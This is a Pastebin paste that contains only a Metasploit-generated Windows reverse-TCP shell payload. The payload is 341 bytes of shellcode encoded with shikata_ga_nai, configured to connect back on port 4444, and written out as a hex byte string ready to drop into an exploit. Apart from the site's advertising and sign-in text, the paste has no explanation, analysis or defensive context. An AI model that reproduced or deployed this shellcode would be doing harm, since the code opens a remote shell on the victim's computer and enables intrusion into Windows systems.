Advertisement
Guest User

Untitled

a guest
Aug 4th, 2015
175
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.79 KB | None | 0 0
  1. # windows/shell_reverse_tcp - 341 bytes
  2. # http://www.metasploit.com
  3. # Encoder: x86/shikata_ga_nai
  4. # VERBOSE=false, LHOST=127.0.0.1, LPORT=4444,
  5. # ReverseConnectRetries=5, ReverseListenerBindPort=0,
  6. # ReverseAllowProxy=false, PrependMigrate=false,
  7. # EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
  8. buf =
  9. "\xd9\xf7\xbf\x74\xb9\x15\x47\xd9\x74\x24\xf4\x58\x33\xc9" +
  10. "\xb1\x4f\x31\x78\x19\x83\xc0\x04\x03\x78\x15\x96\x4c\xe9" +
  11. "\xaf\xdf\xaf\x12\x30\xbf\x26\xf7\x01\xed\x5d\x73\x33\x21" +
  12. "\x15\xd1\xb8\xca\x7b\xc2\x4b\xbe\x53\xe5\xfc\x74\x82\xc8" +
  13. "\xfd\xb9\x0a\x86\x3e\xd8\xf6\xd5\x12\x3a\xc6\x15\x67\x3b" +
  14. "\x0f\x4b\x88\x69\xd8\x07\x3b\x9d\x6d\x55\x80\x9c\xa1\xd1" +
  15. "\xb8\xe6\xc4\x26\x4c\x5c\xc6\x76\xfd\xeb\x80\x6e\x75\xb3" +
  16. "\x30\x8e\x5a\xa0\x0d\xd9\xd7\x12\xe5\xd8\x31\x6b\x06\xeb" +
  17. "\x7d\x27\x39\xc3\x73\x36\x7d\xe4\x6b\x4d\x75\x16\x11\x55" +
  18. "\x4e\x64\xcd\xd0\x53\xce\x86\x42\xb0\xee\x4b\x14\x33\xfc" +
  19. "\x20\x53\x1b\xe1\xb7\xb0\x17\x1d\x33\x37\xf8\x97\x07\x13" +
  20. "\xdc\xfc\xdc\x3a\x45\x59\xb2\x43\x95\x05\x6b\xe1\xdd\xa4" +
  21. "\x78\x93\xbf\xa0\x4d\xa9\x3f\x31\xda\xba\x4c\x03\x45\x10" +
  22. "\xdb\x2f\x0e\xbe\x1c\x4f\x25\x06\xb2\xae\xc6\x76\x9a\x74" +
  23. "\x92\x26\xb4\x5d\x9b\xad\x44\x61\x4e\x61\x15\xcd\x21\xc1" +
  24. "\xc5\xad\x91\xa9\x0f\x22\xcd\xc9\x2f\xe8\x78\xce\xb8\x6c" +
  25. "\x7b\xd0\x39\xfb\x79\xd0\x28\xa7\xf4\x36\x20\x47\x51\xe1" +
  26. "\xdd\xfe\xf8\x79\x7f\xfe\xd6\xe9\x1c\x6d\xbd\xe9\x6b\x8e" +
  27. "\x6a\xbe\x3c\x60\x63\x2a\xd1\xdb\xdd\x48\x28\xbd\x26\xc8" +
  28. "\xf7\x7e\xa8\xd1\x7a\x3a\x8e\xc1\x42\xc3\x8a\xb5\x1a\x92" +
  29. "\x44\x63\xdd\x4c\x27\xdd\xb7\x23\xe1\x89\x4e\x08\x32\xcf" +
  30. "\x4e\x45\xc4\x2f\xfe\x30\x91\x50\xcf\xd4\x15\x29\x2d\x45" +
  31. "\xd9\xe0\xf5\x75\x90\xa8\x5c\x1e\x7d\x39\xdd\x43\x7e\x94" +
  32. "\x22\x7a\xfd\x1c\xdb\x79\x1d\x55\xde\xc6\x99\x86\x92\x57" +
  33. "\x4c\xa8\x01\x57\x45"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement